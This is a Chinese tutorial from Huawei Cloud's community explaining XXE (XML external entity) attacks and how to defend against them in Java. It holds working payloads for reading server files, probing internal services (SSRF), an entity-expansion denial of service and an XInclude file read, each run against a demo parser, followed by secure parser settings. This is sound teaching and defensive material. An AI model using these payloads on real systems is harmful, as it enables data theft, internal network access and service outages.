从原理到实战,详解XXE攻击

原理,实战,详解,xxe,攻击 · 浏览次数 : 18

小编点评

**安全编码防御** **3.1 禁止打开Xinclude开关常见的支持xinclude特性的xml解析器** * 从安全角度考虑,首先禁止打开Xinclude开关。 * 3.2 禁用DTD解析如果业务中不需要进行DTD定义以及解析,最佳方式就是完全禁用DTD解析。例如Dom类型的解析器中通过factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);来禁用。 * 3.3 禁用外部实体解析方式一:如果业务中确实需要DTD定义以及解析,可以通过仅禁用外部实体解析的方式进行安全防护。例如Dom类型的解析器中通过如下方式设置禁用外部实体解析:factory.setFeature("http://xml.org/sax/features/external-general-entities", false);factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);factory.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false); **4 安全编码扫描工具IoT已将包括上述安全编码逻辑在内的常用XML解析器的安全编码规范提取到IoT自定义安全规则集,上线到所有IoT服务的生产发布流水线中,自动化的保障各服务的现网代码安全。如:点击关注,第一时间了解华为云新鲜技术~ 。归纳总结以上内容,生成内容时需要带简单的排版

正文

本文分享自华为云社区《【安全攻防】深入浅出实战系列专题-XXE攻击》,作者: MDKing。

1 基本概念

XML基础:XML 指可扩展标记语言(Extensible Markup Language),是一种与HTML类似的纯文本的标记语言,设计宗旨是为了传输数据,而非显示数据。是W3C的推荐标准。

XML标签:XML被设计为具有自我描述性,XML标签是没有被预定义的,需要自行定义标签与文档结构。如下为包含了标题、发送者、接受者、内容等信息的xml文档。

image1.png

DTD:指文档类型定义(Document Type Definition),通过定义根节点、元素(ELEMENT)、属性(ATTLIST)、实体(ENTITY)等约束了xml文档的内容按照指定的格式承载数据。

如下图,通过<!DOCTYPE 根节点名称 [DTD内容]>的规则指定了该xml文件合法的根节点元素为persons,它的子节点元素为person,以及person的子层元素以及属性。

 

(另外:可通过<!DOCTYPE 根节点名称 SYSTEM "DTD文件名">的方式引入外部的DTD定义文件)

 

image2.png

实体:在DTD中通过<!ENTITY 实体名称 "实体的值">等方式定义实体,相当于定义变量的作用,可在文档内容中通过&实体名称;的方式引用实体的值(变量的值)。

实体类型:实体分为多种类型,从使用范围的维度,分为参数实体(只能在DTD中引用)与非参数实体(可以在DTD中、文档内容中引用)。区别如下:

 
  样例 引用方式 使用范围与场景
非参数实体 <!ENTITY country "中国"> &country; 在DTD中、文档内容中均可引用,一般用来取代重复的字符串
参数实体 <!ENTITY % countrydefine "xxx元素的DTD定义内容"> %country; 仅能在DTD定义中引用,一般用来保存某段重复的DTD定义

从值的来源维度,分为内部实体、外部实体。内部实体为文档内部直接定义值,外部实体为通过http、file等协议从文件外的某处获取内容作为实体的值。区别如下:

 
  样例 特征与使用场景
内部实体 <!ENTITY country "中国"> 值是明确的字符串常量等,可以直接定义在本文档中
外部实体 <!ENTITY country SYSTEM "file:///D:/country.txt"> 值来源于其它文件或者网络

XML外部实体注入:XML External Entity Injection即xml外部实体注入漏洞,简称XXE漏洞。当xml解析器支持对于外部实体的解析且待解析的xml文件可由外部控制时,就会发生此攻击。攻击者可以通过构造外部实体的内容为本地其它目录下的文件、访问内网/外网的制定url等方式实现自己的攻击目的,达到信息泄露、命令执行、拒绝服务、SSRF、内网端口扫描等攻击目的。

Xinclude:Xinclude用来导入外部xml文档,类似于php的include,将外部定义的dtd引入当前文件。该特性可以解决部分场景下引入外部实体具有的局限性,但并不是所有XML 解析器都支持 XInclude,W3C在XInclude Implementations Report中列出了支持的列表,结合XInclude特性也可以在部分场景下执行XXE攻击。常见的支持xinclude特性的xml解析器都是默认关闭xinclude特性的,如果使用,需要在代码中手动开启,如在DOM型解析器中开启如下配置factory.setNamespaceAware(true);factory.setXIncludeAware(true);如果不关闭Xinclude,仅禁用DTD解析也是存在安全风险的。

2 常见攻击场景实战演练

2.1 服务器文件读取(信息泄露)

目的与场景:通过构造特定格式的xml文档,读取服务器上指定文件的内容,达到敏感信息获取的目的。

xml文档payload:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [ 
    <!ELEMENT root (#PCDATA)>
    <!ENTITY pw SYSTEM "file:///D:/securetest/xxe/passwd.txt">]>
<root>&pw;</root>

服务器端代码:

public static void main(String[] args) throws ParserConfigurationException, IOException, SAXException {
        String xml = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n" +
                "<!DOCTYPE root [ \n" +
                "\t<!ELEMENT root (#PCDATA)>\n" +
                "\t<!ENTITY pw SYSTEM \"file:///D:/securetest/xxe/passwd.txt\">]>\n" +
                "<root>&pw;</root>";
        DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
        factory.setValidating(true);
        DocumentBuilder builder = factory.newDocumentBuilder();
        InputStream in = new ByteArrayInputStream(xml.getBytes());
        org.w3c.dom.Document document = builder.parse(in);
        Element rootElement = document.getDocumentElement();

        // 打印根节点元素名称、内容
        System.out.println("根节点名称:" + rootElement.getNodeName());
        System.out.println("根节点内容:" + rootElement.getTextContent());
}

执行结果:成功读取到了passwd.txt的内容。(服务端代码样例中打印在控制台上,对应实际系统中需要有将文档内容打印到界面上等处理。)

image3.png

2.2 内网信息探测

目的与场景:通过构造特定格式的xml文档,可以借助目标主机访问内网的其它主机开放的内部接口等服务。

内网其它服务器模拟准备:通过node staticServer.js命令启动服务器,监听3000端口

let express = require('express')
let app = express();
app.use(express.static(__dirname));
app.get('/getInnerData', function(req, res) {
  console.log(req.headers)
  res.end('AK:abc;SK:ABDCEF')
})
app.listen(3000)

经验证,http请求可成功返回

image4.png

xml文档payload:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [ 
    <!ELEMENT root (#PCDATA)>
    <!ENTITY pw SYSTEM "http://127.0.0.1:3000/getInnerData">]>
<root>&pw;</root>

服务器端代码:

public static void main(String[] args) throws ParserConfigurationException, IOException, SAXException {
        String xml = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n" +
                "<!DOCTYPE root [ \n" +
                "\t<!ELEMENT root (#PCDATA)>\n" +
                "\t<!ENTITY pw SYSTEM \"http://127.0.0.1:3000/getInnerData\">]>\n" +
                "<root>&pw;</root>";
        DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
        factory.setValidating(true);
        DocumentBuilder builder = factory.newDocumentBuilder();
        InputStream in = new ByteArrayInputStream(xml.getBytes());
        org.w3c.dom.Document document = builder.parse(in);
        Element rootElement = document.getDocumentElement();

        // 打印根节点元素名称、内容
        System.out.println("根节点名称:" + rootElement.getNodeName());
        System.out.println("根节点内容:" + rootElement.getTextContent());
    }

执行结果:成功读取到内部接口getInnerData的内容。

image5.png

2.3 DDos攻击

目的与场景:通过构造特殊格式的xml文档,定义多层递归引用的实体(变量)让解析的内容以及时间以指数级增长,以实现DDos攻击的效果。

xml文档payload:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [ 
    <!ELEMENT root (#PCDATA)>
    <!ENTITY lol "lollollollollollollollollollollollollollollollollollollollollollollollollollollollollollol\n">
    <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
    <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
    <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
    <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
    <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
    <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">]>
<root>&lol6;</root>

服务器端代码:

public static void main(String[] args) throws ParserConfigurationException, IOException, SAXException {
    // 获取当前时间
    LocalDateTime startTime = LocalDateTime.now();
    String xml = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n" +
            "<!DOCTYPE root [ \n" +
            "\t<!ELEMENT root (#PCDATA)>\n" +
            "\t<!ENTITY lol \"lollollollollollollollollollollollollollollollollollollollollollollollollollollollollollol\n\">\n" +
            "\t<!ENTITY lol1 \"&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;\">\n" +
            "\t<!ENTITY lol2 \"&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;\">\n" +
            "\t<!ENTITY lol3 \"&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;\">\n" +
            "\t<!ENTITY lol4 \"&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;\">\n" +
            "\t<!ENTITY lol5 \"&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;\">\n" +
            "\t<!ENTITY lol6 \"&lol5;&lol5;&lol5;&lol5;&lol5;\">]>\n" +
            "<root>&lol6;</root>";
    DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
    factory.setValidating(true);
    factory.setExpandEntityReferences(false);
    System.setProperty("entityExpansionLimit", "50000000");
    DocumentBuilder builder = factory.newDocumentBuilder();
    InputStream in = new ByteArrayInputStream(xml.getBytes());
    org.w3c.dom.Document document = builder.parse(in);
    Element rootElement = document.getDocumentElement();

    // 打印根节点元素名称、内容
    System.out.println("根节点名称:" + rootElement.getNodeName());
    System.out.println("根节点内容:" + rootElement.getTextContent());
    System.out.println("根节点内容长度:" + rootElement.getTextContent().length());
    System.out.println("根节点内容大小:" + rootElement.getTextContent().getBytes().length / (1024 * 1024) + "MB");

    // 获取当前时间并计算时间差
    LocalDateTime endTime = LocalDateTime.now();
    Duration duration = Duration.between(startTime, endTime);
    System.out.println("解析执行时间为:" + duration.toMillis() + "豪秒");
}

执行结果:如果程序中不对解析实体做限制的话,可以通过少量的DTD定义,实现海量大小的解析结果的效果,会大量占用服务器的处理、存储。

image6.png

2.4 Xinclude攻击演示

目的与场景:该样例演示了如果打开了Xinclude开关的危险性,即使做了DTD的安全禁用,还是依然可以进行XXE攻击。

xml文档payload:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [ 
    <!ELEMENT root (#PCDATA)>
    <!ENTITY lol "lollollollollollollollollollollollollollollollollollollollollollollollollollollollollollol\n">
    <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
    <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
    <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
    <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
    <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
    <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">]>
<root>&lol6;</root>

服务端代码:

public static void main(String[] args) throws ParserConfigurationException, IOException, SAXException {
    String xml = "<?xml version=\"1.0\" ?>\n" +
            "<root xmlns:xi=\"http://www.w3.org/2001/XInclude\">\n" +
            "<xi:include href=\"file:///D:/securetest/xxe/passwd.txt\" parse=\"text\"/>\n" +
            "</root>";
    DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
    factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
    factory.setNamespaceAware(true);
    factory.setXIncludeAware(true);
    DocumentBuilder builder = factory.newDocumentBuilder();
    InputStream in = new ByteArrayInputStream(xml.getBytes());
    org.w3c.dom.Document document = builder.parse(in);
    Element rootElement = document.getDocumentElement();

    // 打印根节点元素名称、内容
    System.out.println("根节点名称:" + rootElement.getNodeName());
    System.out.println("根节点内容:" + rootElement.getTextContent());
}

执行结果:

image7.png

3 安全编码防御

3.1 禁止打开Xinclude开关

常见的支持xinclude特性的xml解析器都是默认关闭xinclude特性的,如果使用,需要在代码中手动开启,如在DOM型解析器中开启如下配置factory.setNamespaceAware(true);factory.setXIncludeAware(true);如果不关闭Xinclude,仅禁用DTD解析也是存在安全风险的。2.4中演示了即使禁用了DTD解析,打开Xinclude功能开关后存在的安全问题。所以从安全角度考虑,首先禁止打开Xinclude开关。

3.2 禁用DTD解析

如果业务中不需要进行DTD定义以及解析,最好的方式就是完全禁用DTD解析。例如Dom类型的解析器中通过factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);来禁用。效果如下:

image8.png

3.3 禁用外部实体解析

方式一:如果业务中确实需要DTD定义以及解析,可以通过仅禁用外部实体解析的方式进行安全防护。例如Dom类型的解析器中通过如下方式设置禁用外部实体解析:

factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
factory.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);

效果如下:

image9.png

方式二:禁用外部实体解析还有另外一种方式,重写实体解析函数,核心代码:

builder.setEntityResolver(new EntityResolver() {
    @Override
    public InputSource resolveEntity(String publicId, String systemId) throws SAXException,IOException {
        return new InputSource(new StringReader(""));
    }
});

效果如下:

image10.png

4 安全编码扫描工具

IoT已将包括上述安全编码逻辑在内的常用XML解析器的安全编码规范提取到IoT自定义安全规则集,上线到所有IoT服务的生产发布流水线中,自动化的保障各服务的现网代码安全。如:

image11.png

点击关注,第一时间了解华为云新鲜技术~

 

与从原理到实战,详解XXE攻击相似的内容:

从原理到实战,详解XXE攻击

本文分享自华为云社区《【安全攻防】深入浅出实战系列专题-XXE攻击》,作者: MDKing。 1 基本概念 XML基础:XML 指可扩展标记语言(Extensible Markup Language),是一种与HTML类似的纯文本的标记语言,设计宗旨是为了传输数据,而非显示数据。是W3C的推荐标准。

Docker通信全视角:原理、实践与技术洞察

本文全面深入地探讨了Docker容器通信技术,从基础概念、网络模型、核心组件到实战应用。详细介绍了不同网络模式及其实现,提供了容器通信的技术细节和实用案例,旨在为专业从业者提供深入的技术洞见和实际操作指南。 关注【TechLeadCloud】,分享互联网架构、云服务技术的全维度知识。作者拥有10+年

循环神经网络RNN完全解析:从基础理论到PyTorch实战

>在本文中,我们深入探讨了循环神经网络(RNN)及其高级变体,包括长短时记忆网络(LSTM)、门控循环单元(GRU)和双向循环神经网络(Bi-RNN)。文章详细介绍了RNN的基本概念、工作原理和应用场景,同时提供了使用PyTorch构建、训练和评估RNN模型的完整代码指南。 > 作者 TechLea

SaaS化开源项目之HouseKeeper云上部署实践

摘要:华为云DTSE技术专家从源码构建、应用部署到系统调测,详细解读云原生SaaS应用构建的全过程。 本文分享自华为云社区《HouseKeeper云上部署实践》,作者:华为云DTSE。 HouseKeeper是华为云开发者团队基于SaaS项目技术支持实践,采用微服务架构(SpringCloud),结

Python图像处理丨5种图像处理特效

摘要:本篇文章主要讲解了图像常见的特效处理,从处理效果图、算法原理、代码实现三个步骤进行详细讲解,涉及图像素描特效、怀旧特效、光照特效、流年特效、图像滤镜等。 本文分享自华为云社区《[Python图像处理] 二十五.图像特效处理之素描、怀旧、光照、流年以及滤镜特效》,作者: eastmount。 一

Go运算操作符全解与实战:编写更高效的代码!

本文全面探讨了Go语言中的各类运算操作符,从基础的数学和位运算到逻辑和特殊运算符。文章旨在深入解析每一种运算操作符的工作原理、应用场景和注意事项,以帮助开发者编写更高效、健壮和可读的Go代码。 简介 Go语言,作为一种现代的编程语言,不仅因为其简单易读的语法而受到欢迎,还因为它的性能和高度并发能力在

Squirrel状态机-从原理探究到最佳实践

作者:京东物流 郑朋辉 1 简介 Squirrel状态机是一种用来进行对象行为建模的工具,主要描述对象在它的生命周期内所经历的状态,以及如何响应来自外界的各种事件。比如订单的创建、已支付、发货、收获、取消等等状态、状态之间的控制、触发事件的监听,可以用该框架进行清晰的管理实现。使用状态机来管理对象生

算法金 | 再见!!!KNN

大侠幸会,在下全网同名「算法金」 0 基础转 AI 上岸,多个算法赛 Top 「日更万日,让更多人享受智能乐趣」 KNN算法的工作原理简单直观,易于理解和实现,这使得它在各种应用场景中备受青睐。 我们将深入探讨KNN算法,从基本概念到实现细节,从算法优化到实际应用,我们都会一一展开。通过本文,你将了

C#冒泡排序算法

冒泡排序实现原理 冒泡排序是一种简单的排序算法,其原理如下: 从待排序的数组的第一个元素开始,依次比较相邻的两个元素。 如果前面的元素大于后面的元素(升序排序),则交换这两个元素的位置,使较大的元素“冒泡”到右侧。 继续比较下一对相邻元素,重复步骤2,直到遍历到数组的倒数第二个元素。此时,最大的元素

FFmpeg开发笔记(三十三)分析ZLMediaKit对H.264流的插帧操作

​《FFmpeg开发实战:从零基础到短视频上线》一书的“3.4.3 把原始的H264文件封装为MP4格式”介绍了如何把H.264裸流封装为MP4文件。那么在网络上传输的H.264裸流是怎样被接收端获取视频格式的呢?前文指出H.264流必定以“SPS帧→PPS帧→IDR帧”开头,接下来就来验证是否确实